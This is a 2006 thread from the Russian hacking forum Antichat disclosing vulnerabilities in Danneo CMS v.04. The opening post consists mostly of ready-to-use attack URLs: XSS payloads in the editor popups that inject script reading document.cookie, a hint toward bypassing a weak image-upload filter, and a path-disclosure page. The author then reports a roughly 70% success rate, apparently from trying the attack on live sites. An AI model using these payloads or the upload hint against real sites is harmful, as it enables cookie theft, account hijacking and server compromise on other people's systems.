ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Многочисленные уязвимости Danneo CMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Многочисленные уязвимости Danneo CMS
  #1  
Старый 22.04.2006, 09:12
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
Post Многочисленные уязвимости Danneo CMS
DanneoCMS v.04
_http://danneo.com

1. xxs - куки

http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

2. заливка файлов

http://danneosite.com/apanel/editor/...mg_library.php

защита слабенькая:

http://danneosite.com/apanel/editor/...rol.config.php -->

PHP код:
// allowed extentions for uploaded image files
$spaw_valid_imgs = array('gif''jpg''jpeg''png'); 
думайте сами =))

3. раскрытие путей

их много, самое простейшее:

http://danneosite.com/apanel/editor/scripts/demo.php


Antichat.ru © VectorG
 
Ответить с цитированием

  #2  
Старый 22.04.2006, 19:05
Аватар для kot777
kot777
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277

Репутация: 1635


Отправить сообщение для kot777 с помощью ICQ
По умолчанию
Хорошо поработал, насколько массова уязвимость?
__________________
ICQ 328498627

Хочешь Элитный OpenVPN за 10 у.е ?
 
Ответить с цитированием

  #3  
Старый 23.04.2006, 16:38
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию
пробив 70%
некоторые доступ к едитору закрывают
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP, PERL, MySQL, JavaScript 33 12.04.2010 23:18
Девять Комерческих Cms w3r3.w01f PHP, PERL, MySQL, JavaScript 1 21.04.2006 00:27
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ